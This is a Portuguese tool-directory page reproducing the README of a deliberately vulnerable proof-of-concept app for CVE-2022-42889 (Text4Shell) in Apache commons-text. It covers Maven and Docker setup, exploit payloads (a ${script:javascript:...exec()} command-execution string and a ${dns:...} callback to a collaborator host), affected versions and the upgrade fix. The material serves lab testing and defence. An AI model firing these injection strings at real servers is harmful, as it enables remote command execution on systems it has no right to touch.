Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
text4shell-poc — Aplicação de Prova de Conceito para testar CVE-2022-42889 | Kitploit
Ferramentas/GitHubGitHub/securekomodo/text4shell-poc
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e EducaçãoLabs e Prática
GitHubsecurekomodo/text4shell-poc

text4shell-poc

Aplicação de Prova de Conceito para testar CVE-2022-42889

Ver Repositório
811há 3 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Aplicação de Teste PoC para CVE-2022-42889

Esta é uma aplicação vulnerável desenvolvida como Prova de Conceito para a vulnerabilidade CVE-2022-42889.

Instalação com Maven

Para executar isto, você precisará de:

  • JDK 17 ou superior
  • Maven
  1. Clone o repositório git
root@kitploit:~
git clone https://github.com/securekomodo/text4shell-poc.git
cd text4shell-poc
  1. Instalação Maven para criar o JAR
root@kitploit:~
mvn clean install

Isto criará a pasta ./target e dentro dessa pasta deverá estar o arquivo JAR text4shell-poc-0.0.1-SNAPSHOT.jar

  1. Inicie o servidor web
root@kitploit:~
java -jar ./target/text4shell-poc-0.0.1-SNAPSHOT.jar

Isto iniciará um servidor web no seu localhost ouvindo na porta 8080 por padrão

  1. Navegue até o servidor web

Acesse o servidor web em http://localhost:8080/ e você deverá ver a seguinte saída

root@kitploit:~
Text4Shell POC Test -@securekomodo
Send payloads to /reflected?poc=yourpayload
OR Send payloads to /blind with payload as your userAgent
  1. Explore manualmente ou realize uma varredura usando text4shell-scan

Exemplos de Payloads de Exploração

root@kitploit:~
${script:javascript:java.lang.Runtime.getRuntime().exec('touch /tmp/itworked')}
root@kitploit:~
${dns:<burp collaborator host>)}

Codificador de URL recomendado para demonstração bem-sucedida do exploit: https://www.urlencoder.org/.

Docker

Alternativamente, você pode usar Docker para executar este PoC:

  1. Clone o repositório git
root@kitploit:~
git clone https://github.com/securekomodo/text4shell-poc.git
cd text4shell-poc
  1. Docker build
root@kitploit:~
docker build --tag=text4shell-poc .
  1. Docker run
root@kitploit:~
docker run -p 80:8080 text4shell-poc
  1. Teste a aplicação vulnerável
root@kitploit:~
http://localhost/
  1. O ataque pode ser realizado passando uma string “${prefix:name}” como mostrado abaixo:
root@kitploit:~
${script:javascript:java.lang.Runtime.getRuntime().exec('touch /tmp/foo')}
root@kitploit:~
${dns:<burp collaborator host>)}

Codificador de URL recomendado para demonstração bem-sucedida do exploit: https://www.urlencoder.org/.

Alternativamente, você pode validar a eficácia de ferramentas de varredura como text4shell-scan

Você Está Vulnerável?

Para que seu código esteja vulnerável, você precisa de:

  • Estar executando uma versão do Apache commons-text da versão 1.5.0 até (não incluindo) 1.10.0
  • Usando interpolação para StringSubstitution (veja https://commons.apache.org/proper/commons-text/apidocs/org/apache/commons/text/StringSubstitutor.html) - note que isto não é muito comum

A Correção

A correção para isto é atualizar suas instâncias de commons-text para versões 1.10.0 ou posteriores.

Autor

Bryan Smith

  • Twitter: https://twitter.com/securekomodo
Baixar ferramenta